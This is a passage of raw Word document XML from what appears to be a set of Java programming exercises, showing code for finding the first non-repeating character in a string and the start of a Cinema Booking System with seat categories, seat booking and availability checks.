    <w:p w14:paraId="4BE6E0BD"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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73488D19"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4159DB23"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F38ACA6"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irstNonRepeatingCharact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C443B77"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AA11EE"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har</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> findFirstNonRepeating</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in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77EBF2A"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e a map to store the frequency of each character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447870B8"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Charac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charCou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p>
    <w:p w14:paraId="5B89211A"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36C7CF9E"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raverse the string and update the count of each character in the map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74ACD4"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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> c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n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CharArr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916FEFB"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charCou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harCou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OrDefaul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6240C556"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9DF727E"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3C384E73"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raverse the string again to find the first non-repeating character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57266339"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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> c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n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CharArr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6B96C8D"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harCoun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2865E2D"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Return the first non-repeating character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D7AF0D"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863633B"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7E2C2A6"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61522994"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Return null character if no non-repeating character is found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2811F35A"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3B17C57"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFBFBBB"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FF524E1"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inpu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abbcdec"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A948D73"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har</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> resul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indFirstNonRepeat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put</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40035A15"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5BA3A148"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resul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F6F3634"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The first non-repeating character is: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esult</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587F23B5"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ls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089C726"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o non-repeating character found."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A9C1F6"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B82ED4E" w14:textId="77777777"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0E7DCF0" w14:textId="3FCF67FA" w:rsidR="004D0DF0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6CDF67" w14:textId="77777777" w:rsidR="0039191A" w:rsidRPr="00CE4B95" w:rsidRDefault="0039191A" w:rsidP="0039191A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7998C7BE" w14:textId="52752A38" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75920">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="376" w:name="_Toc196307856"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00D47940" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Cinema Booking System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="376"/>
    </w:p>
    <w:p w14:paraId="32321023" w14:textId="77777777" w:rsidR="00A514C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75920" w:rsidP="00A514C0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00A514C0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Develop a Java program that models a Cinema Booking System with the following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A1D05A" w14:textId="6743D792" w:rsidR="00A514C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00295A7A" w:rsidP="00A514C0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00A514C0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>equirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC2EB07" w14:textId="57873AED" w:rsidR="00A514C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00A514C0" w:rsidP="00A514C0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>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t>An Auditorium containing multiple Screens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBF5FAF" w14:textId="79EC77CD" w:rsidR="00A514C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00A514C0" w:rsidP="00A514C0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>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t>Each Screen hosts multiple Movie Shows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC68507" w14:textId="7FBCEE47" w:rsidR="00A514C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00A514C0" w:rsidP="00A514C0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>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t>Each Movie Show offers seating in three categories: Gold, Silver, and Platinum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7533B636" w14:textId="497A35F6" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00A514C0" w:rsidP="00A514C0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>Implement functionality to book tickets, check seat availability, and include additional relevant</w:t>
      </w:r>
      <w:r w:rsidR="00DB71EB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>methods to enhance the booking system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE22EED" w14:textId="62D2413F" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75920">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3200D8FA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6590AAC3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F3E0AA"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1BFED431"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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>enum</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atCategory</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A1F2E26"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GOL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ILV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LATINUM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393A332F"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CA6194"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570E1387"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a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20FF4B0"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isAvailable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492AEB30"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atCategory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> category</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8D75D2"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63EDA38C"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a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eatCategory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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EA81CC9"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categor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ategory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02650638"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sAvailabl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u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nitially available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AC327C"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119BC55"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535AC80B"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isAvailabl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CB92C8E"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isAvailable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EF31BB"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153AD38"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622938D3"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bookSea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275DDAD"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Availabl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EC62CAF"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isAvailabl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73AD128F"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ls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1ADE1BF"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eat is already booked."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BA4883"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37C8131"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A74DFBC"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50B80C35"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atCategory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> get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FB93016"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category</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7685DF"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3FA9998"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1FE35767"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6F9CD592"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to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EBA22FE"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categor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sAvailabl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Availab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Booked]"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DD6C45"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A8F98F7"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EC05FD"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56AE6E9C"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ovieSho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CD63D3F"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movieName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F8A448"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eat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at</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seats</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC32483"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2B5CA4EF"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ovieShow</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movie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goldSea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silverSea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platinumSea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C303BAB"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movie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ovieName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016DD69B"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seat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p>
    <w:p w14:paraId="6DCEB6B9"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sea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eat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OL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a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oldSeats</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E44BCD0"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sea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eat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ILV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a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ilverSeats</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0C4245"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sea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eat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LATIN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a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latinumSeats</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57570836"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40E2F3D5"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goldSea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DB101A7"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seat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eat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OL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a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eat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OLD</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A994440"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4DC2A43"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silverSea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D4E0C1A"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seat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eat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ILV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a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eat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ILVER</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16333164"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4FA8B0A"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platinumSea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AB4E3EF"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seat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eat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LATIN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a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eat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LATINUM</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689937D7"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9002226"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52AECFC"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0AD26FF1"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displaySea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61D35B6"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Movie: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ovieName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A253B1"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eatCategory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> categor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at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value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3719F92"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categor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Seats:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09035798"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eat</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sea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eat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044147E"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eat</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED32168"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4B56161"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D65B4D4"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1D72D1D"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66EA945D"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bookTicke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eatCategory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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seatInde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04AA41A"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seatIndex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eatIndex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seat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A865DFF"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Invalid seat index."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD0F6B2"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3E94FC8E"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A9B105"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at</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sea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eat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eatIndex</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF8FA10"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ea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Availabl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69E0B5B"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sea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ookSeat</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58269034"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uccessfully booked a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ategor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seat."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A76F52E"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ue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A8BAD5"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ls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4143E0C"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eat already booked."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179CFC79"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7C8E6494"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DB56B90"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3EC5F6F"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0E16035D"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checkSeatAvailability</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eatCategory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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seatInde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D8BB8AF"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seatIndex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eatIndex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seat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43910BA"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Invalid seat index."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4392DA"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57658298"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C4FF368"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seat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eatInde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Available</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5239D617"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FD70D32"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4821ECAA"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588103C2"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cree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87A06AF"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creenName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
